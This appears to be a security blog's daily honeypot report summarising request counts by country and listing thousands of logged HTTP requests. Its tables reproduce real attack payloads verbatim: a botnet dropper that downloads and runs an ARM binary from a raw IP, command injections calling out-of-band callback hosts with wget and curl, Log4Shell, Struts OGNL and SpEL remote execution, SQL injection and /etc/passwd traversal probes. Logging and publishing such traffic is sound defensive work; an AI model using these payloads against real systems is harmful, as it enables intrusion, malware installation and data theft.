Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-24

·3208 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-24
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 12 stage 1 IP address(es), linked to 12 dropper URL(s).

There are 577 new requests that have never been observed before (these were added to the monitored request database.).

A total of 6906 requests were recorded during the day, originating from 12 different countries, with a peak of 5234 requests coming from AE.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DEDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
176.65.148.236POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.1
89.39.121.48mac=1&ip=127.0.0.1
89.39.121.48GET /backupmgt/localJob.php?session=fail;wget+http://d0or1j3jkkn1q8dabd70jhwg7nzcfojt6.oast.online; HTTP/1.1
89.39.121.48GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d0or1j3jkkn1q8dabd70oheoeuskhy1pa.oast.online; HTTP/1.1
89.39.121.48GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d0or1j3jkkn1q8dabd70jxrgmupuys6nd.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1
89.39.121.48GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d0or1j3jkkn1q8dabd70ef9fry4phapcx.oast.online) HTTP/1.1
89.39.121.48GET /search.php?search=%22;wget+http%3A%2F%2Fd0or1j3jkkn1q8dabd70suwr8etnbsh8q.oast.online%27;%22 HTTP/1.1
89.39.121.48GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://d0or1j3jkkn1q8dabd701e1xsjch8zn9c.oast.online)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
89.39.121.48GET /?action=command&command=set_city_timezone&value=$(wget%20http://d0or1j3jkkn1q8dabd70zz6q47jf9uooc.oast.online)) HTTP/1.1
89.39.121.48GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d0or1j3jkkn1q8dabd70eokghyjgooy67.oast.online;%27 HTTP/1.1
89.39.121.48GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d0or1j3jkkn1q8dabd70ij66yb789fxxg.oast.online; HTTP/1.1
89.39.121.48GET /page?id=2xXag0C3Z4AuXaHW97dbsU5U7Mi&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d0or1j3jkkn1q8dabd70owjxj3inahyob.oast.online%27);s HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1120POST /admin/ajax.php?action=login HTTP/1.1
2716POST /contactus.php HTTP/1.1
3512POST /login.html HTTP/1.1
3912POST /module/ HTTP/1.1
4212GET /api/blade-user/user-list HTTP/1.1
4812POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
558POST /c/router HTTP/1.1
598GET /2xXafNONYWEwvWczbdmQV8uhXdK.txt HTTP/1.1
708POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
758GET /global-protect/portal/images/2xXafgPyvvB8n6lGGj0cSgnZ4J0.txt HTTP/1.1
798POST /partymgr/control/getJSONuiLabelArray HTTP/1.1
838POST /partymgr/control/getJSONuiLabel HTTP/1.1
848GET /b_download/index.html HTTP/1.1
898POST /tools.cgi HTTP/1.1
918POST /search/ HTTP/1.1
1008POST /controller/login.php?acao=autenticar HTTP/1.1
1078POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
1158POST /rpc.cgi HTTP/1.1
1168POST /session_login.cgi HTTP/1.1
1494GET /wp-content/uploads/workreap-temp/2xXafaccbPYMHJq5oC9dzxacu5a.php HTTP/1.1
1524GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1
1534GET /wp-content/uploads/kaswara/fonts_icon/lkrjzm/nj.php HTTP/1.1
1564GET /wp-content/plugins/imagements/images/2xxafponmwdlrgkhn2eycryyltz.php HTTP/1.1
1584GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\x22 HTTP/1.1
1634POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
1644POST /lucee/2xXagOVWiNamToIYL0b8aFw7ucZ.cfm HTTP/1.1
1764POST /wp-content/plugins/wpcargo/includes/2xXagBOxM9AKQVsJ0Ic5Kdw0UcG.php?1=var_dump HTTP/1.1
1794POST /druid/indexer/v1/sampler HTTP/1.1
1814GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2xXagBOxM9AKQVsJ0Ic5Kdw0UcG.php HTTP/1.1
1824GET /wp-content/plugins/wpcargo/includes/2xXagBOxM9AKQVsJ0Ic5Kdw0UcG.php HTTP/1.1
1854GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1
1904POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
1914POST /magmi/web/magmi_run.php HTTP/1.1
1924GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d0or1j3jkkn1q8dabd70hsko9x4jx6c9e.oast.online%23 HTTP/1.1
1934POST /magmi/web/magmi_saveprofile.php HTTP/1.1
1964POST /meaweb/os/mxperson HTTP/1.1
1984POST /os/mxperson HTTP/1.1
2104GET /assets/data/usrimg/2xxagymweeng5btdlkakkpyovyv.php HTTP/1.1
2124GET /file/UeuLE8.txt HTTP/1.1
2134GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0or1j3jkkn1q8dabd70y7w7baw9qbod6.oast.online+-H+‘User-Agent%3a+NhXnxT’%60 HTTP/1.1
2154GET /include/makecvs.php?Event=%60curl+http%3a//d0or1j3jkkn1q8dabd70ofk7yh3n4womj.oast.online+-H+‘User-Agent%3a+NhXnxT’%60 HTTP/1.1
2164GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
2184GET /public/css/2xXafQwx5gEOnOjUKMZxmWHU0ZN.css HTTP/1.1
2204GET /upload/userfiles/image/2xXagW3hr85pzoFFNiD2zFnrvAD.png HTTP/1.1
2224POST /lucee/admin/imgProcess.cfm?file=/../../../context/2xXagOVWiNamToIYL0b8aFw7ucZ.cfm HTTP/1.1
2234POST /casa/nodes/thumbprints HTTP/1.1
2254POST /wp-json/buddypress/v1/signup HTTP/1.1
2264GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1
2284POST /_adminer.php HTTP/1.1
2294POST /adminer/index.php HTTP/1.1
2304POST /adminer.php HTTP/1.1
2314POST /_adminer/index.php HTTP/1.1
2324POST /adminer/adminer.php HTTP/1.1
2334POST /minio/webrpc HTTP/1.1
2394GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd70acwzspmtsc9ki.oast.online+-H+%27User-Agent:+YixVhj%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd70i85xdhkae4jb3.oast.online+-H+%27User-Agent:+YixVhj%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
2404GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd705ry4ioatwkha4.oast.online+-H+%27User-Agent:+YixVhj%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd70otghcebigssgr.oast.online+-H+%27User-Agent:+YixVhj%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
2444GET /graph_realtime.php?action=init HTTP/1.1
2494GET /magmi/web/info.php HTTP/1.1
2514POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
2524GET /proxy?url=http%3a//0:8080/ HTTP/1.1
2654GET /cgi-bin/2FtrEb.txt HTTP/1.1
2674GET /archive/download?file=file:///etc/passwd HTTP/1.1
2704POST /apply.cgi HTTP/1.1
2714GET /index.php?p=member&destination HTTP/1.1
2744GET /language/lang HTTP/1.1
2754GET /?x=${jndi:ldap://${:-139}${:-211}.${hostName}.uri.d0or1j3jkkn1q8dabd70kfpkufjua3pxo.oast.online/a} HTTP/1.1
2784GET /archive/download?file=http://d0or1j3jkkn1q8dabd70jojdnss3rfn6o.oast.online/ HTTP/1.1
2794GET /vcac/?original_uri=http://xxx.xxx.xxx.xxx%2Fvcac HTTP/1.1
2804GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1
2834POST /modules/appagebuilder/apajax.php?rand=7077579477194 HTTP/1.1
2864GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1
2874POST /ca/rest/certrequests HTTP/1.1
2944GET /backend/backend/auth/signin HTTP/1.1
2964GET /?class.module.classLoader.resources.context.configFile=http://d0or1j3jkkn1q8dabd70cxepi79hx51i6.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
2974GET /?class.module.classLoader.resources.context.configFile=https://d0or1j3jkkn1q8dabd70pxu4r88bzdfzo.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
2994GET /wp-content/uploads/html2wp/2xXah3pbGFXV0s75rdiT35drttN.php HTTP/1.1
3004GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL– HTTP/1.1
3024GET /service/0/test.oast.me HTTP/1.1
3034GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
3044POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
3064POST /actuator/gateway/routes/2xXafNucfd13haaplSKKoL5PQgV HTTP/1.1
3154POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1
3194GET /status.htm HTTP/1.1
3304POST /api/snapshots HTTP/1.1
3334GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
3344GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2xXagcDP8dfL2zOrStmofO1ZxBq.php&target=l1_Lw HTTP/1.1
3364GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2xXafMCUy2JQenrvekCh6MtpCm8.php:aaa HTTP/1.1
3444POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
3464POST /action.php HTTP/1.1
3474POST /delete_cart_goods.php HTTP/1.1
3484POST /home/download HTTP/1.1
3494POST /viewlog.jsp HTTP/1.1
3514GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
3534GET /about/../tree?action=get HTTP/1.1
3554POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
3564POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1
3574GET /module/ph_simpleblog/list?sb_category=’)%20AND%20false–%20- HTTP/1.1
3594GET /2xXafUVAjct11UjyJuydUBwJ5xw.php?cmd=sudo+rpm+–eval+’%25{lua%3aos.execute(\x22curl+http%3a//d0or1j3jkkn1q8dabd70q6w1r7mfmww8x.oast.online+-H+‘User-Agent%3a+fRC6hC’\x22)}’ HTTP/1.1
3604GET /module/ph_simpleblog/list?sb_category=’)%20OR%20true–%20- HTTP/1.1
3624GET /v1/2xXagkOcvPZmfxbsRyTBGLjD7aC.php HTTP/1.1
3644GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
3664POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1
3674GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+mF9lZ8CcYH.log HTTP/1.1
3684GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
3694GET /public/index.php/home/file/user_pics HTTP/1.1
3704POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
3714GET /wp-content/uploads/p3d/2xXaggbLKQNXtc2pRvafmpl8YaN.php HTTP/1.1
3764GET /seeyon/test123456.jsp?pwd=asasd3344&2xXagFMHEdZv1orHtKkiOTiRdXr=ipconfig HTTP/1.1
3794GET /fileserver/2xXagyJ5gasVQd9JvjilKU9CR5j.txt HTTP/1.1
3804GET /debugging_center_utils_.php?log=;echo%20timzvurlbmrbdmlyrxtgxlgborwikxqo%20
3814GET /__ HTTP/1.1
3834POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
3854GET /maint/modules/home/index.php?lang=english
3864GET /webadmin/script?command=
3884POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1
3894POST /_search HTTP/1.1
3934GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1
3944POST /cgibin/webproc HTTP/1.1
3984GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27– HTTP/1.1
3994GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
4014POST /scripts/setup.php HTTP/1.1
4034POST /website/blog/ HTTP/1.1
4174GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1
4184POST /jolokia/read/getDiagnosticOptions HTTP/1.1
4194POST /api/external/7.0/system.System.get_infos HTTP/1.1
4214POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
4224GET /admin/compass?download=L2V0Yy9wYXNzd2Q= HTTP/1.1
4244GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272xxaf7lqlyy3ro7uxuekisfucol%27%2C+NULL%2C+%27FB01AB16CA522DD86565870D7686FEC1%27%2C+%272xxaf7lqlyy3ro7uxuekisfucolFirstName%27%2C+%272xxaf7lqlyy3ro7uxuekisfucolLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272xxaf7lqlyy3ro7uxuekisfucol%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B–+- HTTP/1.1
4254GET //juis_boxinfo.xml HTTP/1.1
4274POST /clients/editclient.php?id=2xXafQ4dtlpbY4Hobx7lLeK7zhd&action=update HTTP/1.1
4294POST /RPC2 HTTP/1.1
4304GET /Synchronization HTTP/1.1
4324GET /MptWR0.txt?true HTTP/1.1
4374GET /RST_status.htm?x=1.gif HTTP/1.1
4394GET /RST_status.htm HTTP/1.1
4484POST /XMLCHART HTTP/1.1
4504GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2xXagQ9NkcwWQoR2r6lOziVhE7q.jsp HTTP/1.1
4564GET /2xXag5Aum3Ax283t9kbD3DVqF8V.jsp HTTP/1.1
4584POST /nagiosql/admin/menuaccess.php HTTP/1.1
4594POST /nagiosql/admin/logbook.php HTTP/1.1
4634GET /logos_clients/2xXafQ4dtlpbY4Hobx7lLeK7zhd.php HTTP/1.1
4654POST /orders/3 HTTP/1.1
4674POST /struts2-rest-showcase/orders/3 HTTP/1.1
4684GET /2xXag75fS7X4bAqdh3issFEdlAK.php%5Cx0A HTTP/1.1
4694GET /debugging_center_utils_.php?log=;echo%20timzvurlbmrbdmlyrxtgxlgborwikxqo%20
4714GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2xXah5UTHfjNTt843ANv5tur5sd.txt HTTP/1.1
4724POST /service/rest/beta/repositories/bower/group HTTP/1.1
4744POST /v2/api/product/manger/getInfo HTTP/1.1
4754POST /service/rapture/session HTTP/1.1
4764POST /content/2xXagHsfRJjXi0bc4pjwG7CrBvd.af.internalsubmit.json HTTP/1.1
4794POST /content/2xXagHsfRJjXi0bc4pjwG7CrBvd HTTP/1.1
4804GET /objects/hrfql.txt HTTP/1.1
4844POST /CDGServer3/ClientAjax HTTP/1.1
4854GET /prfidmtNcn.txt HTTP/1.1
4864GET /objects/getImageMP4.php?base64Url=YGlkID4gaHJmcWwudHh0YA===&format=jpg HTTP/1.1
4874GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20prfidmtNcn.txt%60 HTTP/1.1
4884GET /objects/getImage.php?base64Url=YGlkID4gaHJmcWwudHh0YA===&format=png HTTP/1.1
4904POST /cgi-bin/supportInstaller HTTP/1.1
4964POST /node/1?_format=hal_json HTTP/1.1
4974GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gaHJmcWwudHh0YA===&format=jpg HTTP/1.1
4994GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
5034GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1
5044GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
5054POST /jars/upload HTTP/1.1
5064GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
5074POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
5084POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
5094POST /modules/appagebuilder/apajax.php?rand=8523591246111 HTTP/1.1
5104GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e6859595763334f45464b5a474a465a46646d56545a47656d394e515464476145705822207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1
5134GET /include/vytk.txt HTTP/1.1
5144GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Evytk.txt HTTP/1.1
5164POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
5194POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
5204GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
5214POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
5234GET /api/experimental/test HTTP/1.1
5274POST /webtools/control/xmlrpc HTTP/1.1
5294GET /Uploads/2xXafmbvsuW5hdLz6RBuzWMy97Z.php7 HTTP/1.1
5314GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
5354POST /index.php/User/doLogin HTTP/1.1
5364POST /mobile/plugin/browser.jsp HTTP/1.1
5384GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
5394GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1
5404POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
5414POST /?q=node&destination=node HTTP/1.1
5434GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
5464POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
5474POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp&nonce HTTP/1.1
5524GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
5534GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
5554POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
5564POST /pandora_console/index.php?login=1 HTTP/1.1
5584GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
5594POST /dashboard/uploadID.php HTTP/1.1
5604POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
5624GET /talari/app/files/2xXafNaA0YEzYpMBr8EnNAlHkaD HTTP/1.1
5644GET /?echo+XLutucaNAy HTTP/1.1
5654POST /boafrm/formSysCmd HTTP/1.1
5674GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
5714POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
5794GET /wp-content/plugins/LayerSlider/assets/static/public/front.css HTTP/1.1
5834GET /?InternalDir=\x5C..\x5C..\x5C..\x5C..\x5Cetc&InternalFile=passwd HTTP/1.1
5854GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
5894GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgZDBvcjFqM2pra24xcThkYWJkNzBqOWVyOGhjbjgzZWRqLm9hc3Qub25saW5l%22))) HTTP/1.1
5924POST /gremlin HTTP/1.1
5934POST /app/rest/users/id:1/tokens/2xXafmdV8TCH2qFVw2wRmNwVZgx;.jsp?jsp_precompile=true HTTP/1.1
5944GET /wbabt.txt HTTP/1.1
5994GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,504b032ee5825d3283f82297426c7f35,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1
6034POST /dana-na/auth/saml-sso.cgi HTTP/1.1
6054GET /importexport.php?sql=c2VsZWN0KzksbWQ1KDk4Njk1NjgpLDk=&type=exportexcelbysql HTTP/1.1
6184POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
6254GET /Admin/index.php HTTP/1.1
6264POST /Admin/login.php HTTP/1.1
6304GET /index.php?noAUTO=1 HTTP/1.1
6334GET /wp-json/lp/v1/load_content_via_ajax/?callback={\x22class\x22%3a\x22LP_Debug\x22,\x22method\x22%3a\x22var_dump\x22}&args=\x222xXafIv58n57jETMYoSbwl333Ue\x22 HTTP/1.1
6404GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1
6414GET /model-versions/get-artifact?path=random&name=sMaJxE&version=2 HTTP/1.1
6424GET /wp-json/lp/v1/courses/archive-course?order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1
6434POST /3/ParseSetup HTTP/1.1
6444GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1
6464GET /nodes?view=summary HTTP/1.1
6544GET /52uBX/CVE-2023-47246.txt?true HTTP/1.1
6554POST /userentry?accountId=/../../../tomcat/webapps/52uBX/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
6574GET /user/login/ HTTP/1.1
6594GET /api/clusters HTTP/1.1
6604POST /dana-ws/saml20.ws HTTP/1.1
6614GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d0or1j3jkkn1q8dabd70qujy3eqonjnnr.oast.online HTTP/1.1
6624GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6634GET /xstoremgwt/cheetahImages?imageId=..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1
6644GET /queue/data?session_hash=2xXagjpQbnS8SaNY4t7cXCX9gtM HTTP/1.1
6674POST /queue/join HTTP/1.1
6684POST /component_server HTTP/1.1
6714GET /?__wpdmxp=%27][/wpdm_package][wpdm_all_packages][wpdm_package%20id=%27 HTTP/1.1
6794GET /home/xgvay.php HTTP/1.1
6814GET /model-versions/get-artifact?name=2xXag0DHjbkIiVqU6g6wdnGTxvu&path=etc%2Fpasswd&version=1 HTTP/1.1
